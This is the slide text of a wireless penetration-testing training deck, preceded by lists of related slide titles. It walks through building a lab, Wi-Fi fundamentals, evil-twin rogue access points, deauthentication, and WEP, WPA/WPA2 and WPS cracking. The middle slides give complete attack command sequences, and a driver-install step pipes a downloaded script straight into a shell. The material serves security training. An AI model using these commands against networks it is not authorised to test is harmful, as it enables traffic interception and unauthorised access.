Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authenticationMohammed Adam
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamMohammed Adam
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamMohammed Adam
 
Introduction to null villupuram community
Introduction to null villupuram communityIntroduction to null villupuram community
Introduction to null villupuram communityMohammed Adam
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamMohammed Adam
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Mohammed Adam
 
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityOSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityMohammed Adam
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics Mohammed Adam
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolWhat is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolMohammed Adam
 

More from Mohammed Adam (20)

Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2
 
Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Android Penetration Testing - Day 1
Android Penetration Testing - Day 1
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Basic Foundation For Cybersecurity
Basic Foundation For CybersecurityBasic Foundation For Cybersecurity
Basic Foundation For Cybersecurity
 
Golden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceGolden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain Persistence
 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profit
 
Introduction to Network Fundamentals
Introduction to Network FundamentalsIntroduction to Network Fundamentals
Introduction to Network Fundamentals
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authentication
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by Adam
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed Adam
 
Introduction to null villupuram community
Introduction to null villupuram communityIntroduction to null villupuram community
Introduction to null villupuram community
 
Internet security
Internet securityInternet security
Internet security
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed Adam
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2
 
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityOSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics Vulnerability assessment &amp; Penetration testing Basics
Vulnerability assessment &amp; Penetration testing Basics
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolWhat is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) Protocol
 
Network Security
Network SecurityNetwork Security
Network Security
 

Recently uploaded

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Wireless Penetration Testing

  • 2. Agenda WIRELESS PENETRATION TESTING • Lab Setup • Wi-Fi Network Fundamentals • Wireless Packets • Wi-Fi Network Interaction • Wireless Reconnaissance • Rogue Access points • Cracking WEP • Cracking WPA/WPA2 • WPS Attacks • Security Best Practices
  • 3. Lab Setup Hardware requirements • TP-Link WN722N • Alfa AWUS036H • Melon RTL8187L • Alfa AWUS036NHA • Panda PAU05 • Alfa AWUS036NEH
  • 4. Hardware of my choice for this session: TL-WN722N Wi-Fi Adaptor
  • 5. System Architecture • Minimum System Configuration • Windows 10 in Host Machine • Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2CPU • Virtualisation Platform • Virtual box (https://www.virtualbox.org/) (or) • VMware (https://www.vmware.com/in/products/workstation- player/workstation-player-evaluation.html) • OS needs to be installed inside VM • Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
  • 6. Software Requirements • Aircrack-ng • Wifite • Bettercap • Johntheripper • Hashcat • coWPATTY • Kismet • Fluxion • Wi-Fi-Pumpkin
  • 7. Wi-Fi Network Fundamentals IEEE 802.11 • IEEE 802.11 is part of the IEEE 802 set of local area network (LAN) technical standards, and specifies the set of media access control (MAC) and physical layer (PHY) protocols for implementing wireless local area network (WLAN) computer communication. • The standard and amendments provide the basis for wireless network products using the Wi-Fi brand and are the world's most widely used wireless computer networking standards. • IEEE 802.11 is used in most home and office networks to allow laptops, printers, smartphones, and other devices to communicate with each other and access the Internet without connecting wires. IEEE 802.11 is also a basis for vehicle-based communication networks with IEEE 802.11p.
  • 8. IEEE 802.11 (Contd.) • The standards are created and maintained by the Institute of Electrical and Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802). • The base version of the standard was released in 1997 and has had subsequent amendments. While each amendment is officially revoked when it is incorporated in the latest version of the standard, the corporate world tends to market to the revisions because they concisely denote the capabilities of their products. • IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz, 5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications list channels that might be used, the radio frequency spectrum availability allowed varies significantly by regulatory domain. • The protocols are typically used in conjunction with IEEE 802.2, and are designed to interwork seamlessly with Ethernet, and are very often used to carry Internet Protocol traffic.
  • 12. Wireless Lan: 802.11 Standards Comparison Wi-Fi 7 Expected to Launch in second half of 2024, Currently we are using Wi-Fi 6
  • 14. Basic Terminologies(Contd.) Access Point (AP) • AP is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. • As a standalone device, the AP may have a wired connection to a router, but, in a wireless router, it can also be an integral component of the router itself. Service Set Identifier (SSID) • A service set identifier (SSID) is a sequence of characters that uniquely names a wireless local area network (WLAN). • An SSID is sometimes referred to as a "network name" This name allows stations to connect to the desired network when multiple independent networks operate in the same physical area.
  • 15. Basic Terminologies(Contd.) Basic Service Set Identifier (BSSID) • Its the MAC physical address of the access point or wireless router that is used to connect to the Wi-Fi. Extended Service Set Identifier (ESSID) • It is a wireless network, created by multiple access points, which appears to users as a single, seamless network, such as a network covering a home or office that is too large for reliable coverage by a single access point. Roaming • Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and connects to a different one.
  • 16. Basic Terminologies(Contd.) Channel • A Wi-Fi channel is the frequency at which your router sends out the information to your device. Most routers and devices support several bands for your Wi-Fi connection, most popular being 5 GHz and 2.4 GHz. Each of these ranges gets divided into smaller slots that are channels. Data Rate • Data rates varying modulation types and number of spatial streams; 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps, 867 Mbps. Beacon • Wi-Fi beacons are relatively short, regular transmissions from access points (APs) with a purpose to inform user devices (clients) about available Wi-Fi services and near-by access points. Clients use beacons to decide which AP with which to connect.
  • 18. Wireless Operating modes (Contd.) • Managed - Managed mode allows you to configure your laptop or desktop system as an AP for providing connectivity to other wireless stations. • Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices can communicate directly with each other. This type of wireless network is also called peer-to-peer mode. • Master - When your wireless card is in master mode it acts as an access point and it actively transmits a signal • Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. • Auto - the easiest way to configure a wireless interface and is enabled by default
  • 19. TP-Link TL-WN722N Driver Software installation: • Sudo apt update • Sudo apt upgrade • Sudo apt dist-upgrade • Sudo reboot • Sudo apt install bc • Sudo apt get install build-essential • Sudo apt-get install libelf-dev • Sudo apt install linux-headers-amd64 • Echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf" • Reboot • Git clone https://github.com/aircrack-ng/rtl8188eus • Cd rtl8188eus • sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"
  • 20. Monitor Mode • Start the Kali OS in VMware or Virtual box • Plug-in USB Tplink Wireless Adapter (TL-WN722N) • Run following command • iwconfig
  • 21. Monitor Mode(Contd.) • By default it will be in Auto or Managed mode • Run following commands to switch to Monitor mode • Airmon-ng start wlan0 • Airmon-ng check kill [if any previous processes are running do this] • iwconfig • To Disable monitor mode run airmon-ng stop wlan0 • Restart network manager – service network-manager start
  • 23. Wireless Packets – IEEE 802.11 Mac Frame Structure
  • 30. WPA2 Personal and Enterprise
  • 33. Wireless Reconnaissance • Tools required: Bettercap, airodump-ng & Kismet • In Bettercap, run following commands • Choose interface before, bettercap --iface wlan0 • Help wifi • Wifi.recon on • Wifi.show • Wifi.recon off
  • 35. Wardriving with Kismet (Just for reference) • This can be achieved only, if we are moving or driving or roaming in a vehicle from multiple location to capture Wi-Fi hotspots with GPS Information. • Hardware required - Car, Laptop, Android Phone, Wifi Adapter • Software Required – Kismet, GPSD, ADB, Share GPS (AndroidApp), Google Earth • Reference blog link - https://veteransec.org/wifi-hacking-wardriving- with-an-android-phone-and-raspberry-pi-3/
  • 38. Rogue Access points requirements • Tools Required: airodump-ng, airbase-ng, airmon-ng and Wi-Fi- pumpkin 3 • Wi-Fi pumpkin 3 installation • Git clone https://github.com/P0cL4bs/wifipumpkin3 • https://wifipumpkin3.github.io/docs/getting-started#installation • DNSmasq • apt-get install dnsmasq -y
  • 39. Creation of Rogue AP using Wi-Fi Pumpkin 3 • Plugin wireless adapter & It doesn’t required monitor mode enabled. Run following commands • Wifipumpkin3 • Set interface wlan0 • Set ssid hello • Set proxy noproxy • Start • It will create an Rogue AP with Name With name Hello
  • 40. Creation of Rogue AP using Wi-Fi Pumpkin 3 (Contd.) • Once any device is connected to Rogue AP “Hello” we can intercept the traffic of connected clients easily. (Eviltwin attack)
  • 41. Creation of Rogue AP using Air-ng tools • Airodump-ng wlan0 • Airbase-ng -c 11 –e tplink –s –W 1 wlan0 • Airodump-ng –c 11 --bssid bssidoftplinknewlycreated –w 1 wlan0 • For Eviltwin/MITM attack we need DNSmasq • airbase-ng -e TP-Link -c 8 wlan0 [create fake ap for eviltwinattack] • at0 interface is created geany /etc/dnsmasq.conf interface=at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1
  • 42. Creation of Rogue AP using Air-ng tools (Contd.) Run below commands in separate terminal • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with any device now, we can see the traffic
  • 44. Cracking WEP Create a rogue access point with WEP Cipher • Airbase-ng –c 11 –e hello –w 31:32:33:34:35 wlan0 Use the same Dnsmasq config here • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with device with WEP Fake AP • Airodump-ng wlan0 [ to check whether the fake ap is Up or not]
  • 45. Cracking WEP(Contd.) • DeAuthentication attack with aireplay-ng • Aireplay-ng --deauth 0 –a macaddressoffakeAP –c macaddressofclientconnected wlan0 • DeAuthentication attack with bettercap • Bettercap --iface wlan0 • Wifi.recon on & wifi.show • Wifi.deauth macaddressoffakeAP • Macchanger • Ifconfig wlan0 down • Macchanger –r wlan0 • Ifconfig wlan0 up
  • 46. Cracking WEP(Contd.) • Airdump-ng to dump the wep.cap file • airodump-ng -c 11 --bssid macaddfakeAP –w wepcrack wlan0 • Fake Authentication • Aireplay-ng --fakeauth 60 –e hello –a macaddresfakeAP –h macaddressofwlan0 wlan0 • ARP Request Replay attack • Aireplay-ng --arpreplay -e hello -a macaddfakeAP -h macaddrwlan0 wlan0 • Again perform deauth attack • Aireplay-ng --deauth 0 –a macaddfakeAP -c macaddrclientconnected wlan0 • Stop the deauth • Crack the WEP captured file using aircrack-ng • Aircrack-ng wep-cracking.cap [it will crack the WEP key]
  • 48. Cracking WEPDUMP File using Aircrack-ng
  • 54. Capture the WPA/WPA2 Handshake file • Run the following commands: • airmon-ng start wlan0 [Put the wireless adapter in Monitor mode] • airodump-ng wlan0 [Listen to all the APs which are alive] • airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture wpacracking handshake file with airodump-ng] • Do a Deauthentication attack manually by disconnection/connecting your mobile device to that AP • aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt [Pass the wordlist with handshake file]
  • 55. Capture the WPA/WPA2 Handshake file(Contd.)
  • 56. Cracking WPA/WPA2 using John the Ripper • John --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking.cap
  • 57. Cracking WPA/WPA2 using Wifite • Wifite –wpa • Before starting the attack connect with a client device
  • 59. Cracking WPS (PIN attacks) • wifite --wps [Using Wifite] • reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K [Using Reaver]
  • 60. Next-Gen Wireless Assessment tools Wi-Fi Pineapple
  • 61. Security Best Practices • Change default passwords • Restrict access to authorized users • Encrypt the data on your network • Protect your Service Set Identifier (SSID) • Install a firewall • Maintain antivirus software • Use file sharing with caution • Keep your access point software patched and up to date • Check your internet provider’s or router manufacturer’s wireless security options • Connect using a Virtual Private Network (VPN) Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003